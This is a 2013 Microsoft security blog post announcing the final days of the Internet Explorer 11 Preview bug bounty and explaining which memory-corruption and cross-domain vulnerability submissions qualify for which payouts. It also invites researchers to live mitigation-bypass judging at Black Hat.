<p>First, the Internet Explorer 11 Preview Bounty is entering its final 10 days; the bounty period for that program closes on the 26<sup>th</sup> of July. We’ll gladly accept submissions of vulnerabilities found after that, but the bug bounty for individual IE vulnerabilities will be over. The two platform-wide bounty programs will continue to be available and ready to pay out up to $100,000 for a truly novel exploitation technique, and up to a $50,000 bonus for defense.</p>
<p>So far, we’ve received many submissions and were able to notify the first bounty recipient last week. We have several more that have qualified for bounties and we're excited to see so many great submissions. Other finders are in the process of being notified via secure [at] microsoft [dot] com. After the close of the bounty period, we’ll post an acknowledgement page saluting all those finders who wish to be publicly identified. Meanwhile, our triage team is bracing for a last rush of vulnerability submissions as we approach the final days of the IE-specific bounty program; we’re keeping them fed and hydrated as best we can.</p>
<p>For those of you interested in examples of what the judges are looking for when it comes to awarding the bounties, here they are, from the judges themselves. To qualify for the highest bounties, we look at the severity of the issue as well as the overall quality of the submission to determine the bounty amount.</p>
<p style="padding-left: 30px;"><strong>Memory Corruption:</strong> Most memory corruption vulnerabilities that are found in Internet Explorer have the potential to enable remote code execution and therefore are likely to qualify for the $1,100 bounty. For example, the memory corruption vulnerabilities that were addressed in <a href="http://technet.microsoft.com/en-us/security/bulletin/MS13-055">MS13-055</a> represent the types of vulnerabilities that would qualify (e.g. CVE-2013-3115).</p>
<p style="padding-left: 30px;">To qualify for the $11,000 bounty, we must receive a submission that proves that a vulnerability is exploitable for remote code execution. This means the submission must include a functioning exploit that is able to bypass all relevant mitigations and run arbitrary code (such as executing calc.exe). In addition, the submission must include a whitepaper that describes the root cause of the vulnerability. <strong>If the technique used to exploit the vulnerability is truly novel, then we would award the $100,000 Mitigation Bypass Bounty in addition to the $11,000 IE 11 Preview Bug Bounty.</strong></p>
<p style="padding-left: 30px;"><strong>Design Issues:</strong> We’ve been receiving a lot of submissions that, while extremely clever in their own right, do not meet the bar as an “Important or higher severity design-level vulnerability.” In order to qualify for a design-level bounty, an issue will need to match up to what we’ve historically ranked at these levels. Execution of arbitrary code qualifies, of course, but in the design-level space these issues aren’t as common.</p>
<p style="padding-left: 30px;">More common are the Important-severity information disclosure bugs we tend to call “Cross Domain,” or in modern industry parlance, “Universal XSS” or “Same Origin Policy Bypass” bugs. These are issues where a malicious page can, generally without caveat, reach out into a different security context and grab information it should not have access to. A good example would be CVE-2008-2947, fixed in <a href="http://technet.microsoft.com/en-us/security/bulletin/MS08-058">MS08-058</a>.</p>
<p><span style="font-size: small;"><span style="font-family: Calibri;">Of course, one place to seek some of the best and brightest security researchers at the end of July is in Las Vegas, at Black Hat – and what better place for the spectacle of live pwnage? That’s why on 31 July and 1 August, at around noon each day, we’ll be judging live mitigation bypass attempts at the Microsoft booth. 
Even if you don&rsquo;t have a new exploitation technique to try out yourself, stop by for what I call the &ldquo;exploit art walk&rdquo; &ndash; because those who have the skills to bypass the latest platform defenses are true artists, and a rare breed. </span></span></p> <p><span style="font-family: Calibri; font-size: small;">If you think you&rsquo;ve got what it takes, show up at the booth &ndash; we&rsquo;ll have the </span><a href="http://www.microsoft.com/security/msrc/report/bypass_bounty.aspx"><span style="color: #0563c1; font-family: Calibri; font-size: small;">guidelines</span></a><span style="font-size: small;"><span style="font-family: Calibri;"> posted, or you can read them at that link &ndash; or reach out to me via Twitter to let us know your plans.</span></span></p> <p><span style="font-size: small;"><span style="font-family: Calibri;">What happens in Vegas could earn you $100,000.&nbsp; See you there.</span></span></p> <p><span style="font-size: small;"><span style="font-family: Calibri;">Katie Moussouris<br /></span></span><span style="font-size: small;"><span style="font-family: Calibri;">Senior Security Strategist, MSRC<br /></span></span><a href="http://twitter.com/k8em0"><span style="color: #0563c1; font-family: Calibri; font-size: small;">http://twitter.com/k8em0</span></a><span style="font-size: small;"><span style="font-family: Calibri;"> (that&rsquo;s a zero)</span></span></p><div style="clear:both;"></div><img src="http://blogs.technet.com/aggbug.aspx?PostID=3585422&AppID=4967&AppType=Weblog&ContentType=0" width="1" height="1">bountyprogramsZero-Day ExploitBlueHat PrizeSecurity ResearchBounty Attention Bounty Hunters – The Ramp Up to Black Hathttp://blogs.technet.com/b/bluehat/archive/2013/07/17/attention-bounty-hunters-the-ramp-up-to-black-hat.aspxWed, 17 Jul 2013 15:57:00 